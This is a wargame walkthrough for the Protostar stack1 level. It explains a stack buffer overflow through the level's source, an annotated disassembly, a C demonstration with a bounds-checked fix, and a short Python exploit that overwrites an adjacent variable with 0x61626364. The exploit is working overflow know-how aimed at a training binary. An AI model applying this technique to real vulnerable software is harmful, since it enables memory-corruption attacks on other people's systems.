Hello Guyz,
In this post I am going to show you how to beat the Protostar stack1 level. Today's focus is variable overwriting: a simple technique that changes the value of a variable sitting on the stack while the program is running.
Before starting this walkthrough, I want to highlight a few points:
- I'm not the creator of the Protostar wargame, I am just a player.
- Here I am only providing hints and reference material, so that if you get stuck anywhere you can take a look here.
Source code (the `err.h` include is added here so `errx` is declared; the level's own source omits it and relies on an implicit declaration):

```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>

int main(int argc, char **argv)
{
  volatile int modified;   /* sits right after buffer on the stack */
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);   /* no length check: argv[1] can exceed 64 bytes */

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
  return 0;
}
```
Hint provided by Exploit-Exercises:
This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.
This level is at /opt/protostar/bin/stack1
If you are unfamiliar with the hexadecimal being displayed, "man ascii" is your friend.
Protostar is little endian
Solution:
We simply need to overwrite the value of the `modified` variable located on the stack. `buffer` is 64 bytes long and `modified` sits directly after it, so any bytes that `strcpy` copies beyond the 64th land in `modified`.
Before starting, let's understand the situation on the stack (offsets in bytes from `esp` after the prologue):

```
offset:   0              28                          92           96
          +--------------+----------------------------+------------+
          | other things | injectable area            | modified   |
          |              | (buffer, 64 bytes)         | (4 bytes)  |
          +--------------+----------------------------+------------+
```
Disassembly of main (comments added after each instruction):

```asm
0x08048464 <+0>:   push ebp
0x08048465 <+1>:   mov ebp,esp
0x08048467 <+3>:   and esp,0xfffffff0
0x0804846a <+6>:   sub esp,0x60                      ; reserve 96 bytes (0x60) of stack for locals and call arguments
0x0804846d <+9>:   cmp DWORD PTR [ebp+0x8],0x1       ; compare argc with 1
0x08048471 <+13>:  jne 0x8048487 <main+35>           ; argc != 1: skip the errx call
0x08048473 <+15>:  mov DWORD PTR [esp+0x4],0x80485a0 ; "please specify an argument\n"
0x0804847b <+23>:  mov DWORD PTR [esp],0x1           ; exit status 1
0x08048482 <+30>:  call 0x8048388 <errx@plt>
0x08048487 <+35>:  mov DWORD PTR [esp+0x5c],0x0      ; modified = 0 (modified lives at esp+0x5c = offset 92)
0x0804848f <+43>:  mov eax,DWORD PTR [ebp+0xc]       ; eax = argv
0x08048492 <+46>:  add eax,0x4                       ; eax = &argv[1]
0x08048495 <+49>:  mov eax,DWORD PTR [eax]           ; eax = argv[1] (pointer to our string)
0x08048497 <+51>:  mov DWORD PTR [esp+0x4],eax       ; second strcpy argument: source
0x0804849b <+55>:  lea eax,[esp+0x1c]                ; eax = &buffer (buffer lives at esp+0x1c = offset 28)
0x0804849f <+59>:  mov DWORD PTR [esp],eax           ; first strcpy argument: destination
0x080484a2 <+62>:  call 0x8048368 <strcpy@plt>       ; copies until the NUL, no length check
0x080484a7 <+67>:  mov eax,DWORD PTR [esp+0x5c]      ; eax = modified
0x080484ab <+71>:  cmp eax,0x61626364                ; compare with the target value
0x080484b0 <+76>:  jne 0x80484c0 <main+92>           ; not equal: go to the "Try again" branch
0x080484b2 <+78>:  mov DWORD PTR [esp],0x80485bc     ; success message
0x080484b9 <+85>:  call 0x8048398 <puts@plt>
0x080484be <+90>:  jmp 0x80484d5 <main+113>
0x080484c0 <+92>:  mov edx,DWORD PTR [esp+0x5c]      ; edx = modified (printed as 0x%08x)
0x080484c4 <+96>:  mov eax,0x80485f3                 ; "Try again, you got 0x%08x\n"
0x080484c9 <+101>: mov DWORD PTR [esp+0x4],edx
0x080484cd <+105>: mov DWORD PTR [esp],eax
0x080484d0 <+108>: call 0x8048378 <printf@plt>
0x080484d5 <+113>: leave
0x080484d6 <+114>: ret
```

Note that buffer starts at offset 28 and 28 + 64 = 92, which is exactly where `modified` is stored: the two are adjacent with no padding in between.
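To make that layout concrete, here is an added example (my own code, not part of the Protostar sources) that models the frame as a struct with `buffer` followed by `modified`, exactly the adjacency the disassembly shows. It assumes a little-endian host, like Protostar, and reproduces the unchecked strcpy-style copy so you can see `modified` end up as 0x61626364; beside it is a bounds-checked copy that rejects the same input, which is the fix the program is missing. The struct name, the function names and the `'a'` filler are my assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Value stack1 compares `modified` against (from the level's source). */
#define TARGET 0x61626364u
#define BUF_SIZE 64

/* Assumed model of stack1's frame, taken from the disassembly: buffer at
 * esp+0x1c and modified at esp+0x5c, i.e. modified begins exactly 64 bytes
 * after buffer with no padding in between. */
struct stack1_frame {
    char buffer[BUF_SIZE];
    uint32_t modified;
};

/* i-th byte of v as stored in memory on a little-endian machine.
 * For 0x61626364 this yields 0x64 0x63 0x62 0x61, i.e. "dcba". */
unsigned le_byte(uint32_t v, unsigned i) {
    return (v >> (8 * i)) & 0xffu;
}

/* Build the input described on the page: 64 filler bytes, then TARGET in
 * little-endian order, NUL-terminated. Returns the number of bytes written
 * (excluding the NUL), or 0 if out is too small. */
size_t build_payload(char *out, size_t outsz) {
    if (outsz < BUF_SIZE + 4 + 1) return 0;
    memset(out, 'a', BUF_SIZE);
    for (unsigned i = 0; i < 4; i++)
        out[BUF_SIZE + i] = (char)le_byte(TARGET, i);
    out[BUF_SIZE + 4] = '\0';
    return BUF_SIZE + 4;
}

/* Unchecked copy behaving like strcpy: copies up to the source NUL with no
 * regard for the destination size. It writes through the frame's raw bytes
 * so the spill into `modified` is reproduced while staying inside the
 * struct (a limit the real program does not have). */
static void copy_unchecked(struct stack1_frame *f, const char *src) {
    size_t n = strlen(src) + 1;
    if (n > sizeof *f) n = sizeof *f;
    memcpy((unsigned char *)f, src, n);
}

/* Hardened copy: refuse input that does not fit instead of truncating it
 * silently. Returns 0 on success, -1 when rejected. */
static int copy_checked(char *dst, size_t dstsz, const char *src) {
    size_t n = strlen(src);
    if (n >= dstsz) return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Run the payload through one of the two copies and report the resulting
 * value of `modified`: TARGET after the unchecked copy, 0 after the checked
 * copy because the input is rejected and the frame is left untouched. */
uint32_t modified_after_copy(int use_checked) {
    struct stack1_frame f;
    char payload[BUF_SIZE + 8];
    f.modified = 0;
    if (build_payload(payload, sizeof payload) == 0) return 0;
    if (use_checked) {
        if (copy_checked(f.buffer, sizeof f.buffer, payload) != 0)
            return f.modified;   /* rejected: still 0 */
    } else {
        copy_unchecked(&f, payload);
    }
    return f.modified;
}

int main(void) {
    char payload[BUF_SIZE + 8];
    size_t n = build_payload(payload, sizeof payload);
    printf("payload is %zu bytes and ends in: %.4s\n", n, payload + BUF_SIZE);
    printf("unchecked copy -> modified = 0x%08x\n", modified_after_copy(0));
    printf("checked copy   -> modified = 0x%08x\n", modified_after_copy(1));
    return 0;
}
```

Compile with `gcc -std=c99 -Wall` and run it. The interesting design choice is in `copy_checked`: it rejects oversized input rather than truncating, because a truncating replacement such as a bare `strncpy` can leave the buffer without a NUL terminator and merely moves the bug somewhere else.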
Exploit (ported to Python 3; the `<` in the struct format pins little-endian byte order explicitly, and writing raw bytes avoids the trailing newline `print` would add):

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import struct
import sys

# Usage: python3 exploit.py > tmp && ./bin/stack1 "$(cat tmp)"

# 64 bytes fill the buffer, then the target value in little-endian order
# (0x61626364 becomes the bytes "dcba" in memory)
payload = b"a" * 64
payload += struct.pack("<I", 0x61626364)

sys.stdout.buffer.write(payload)
```
Very Easy! Hahaha.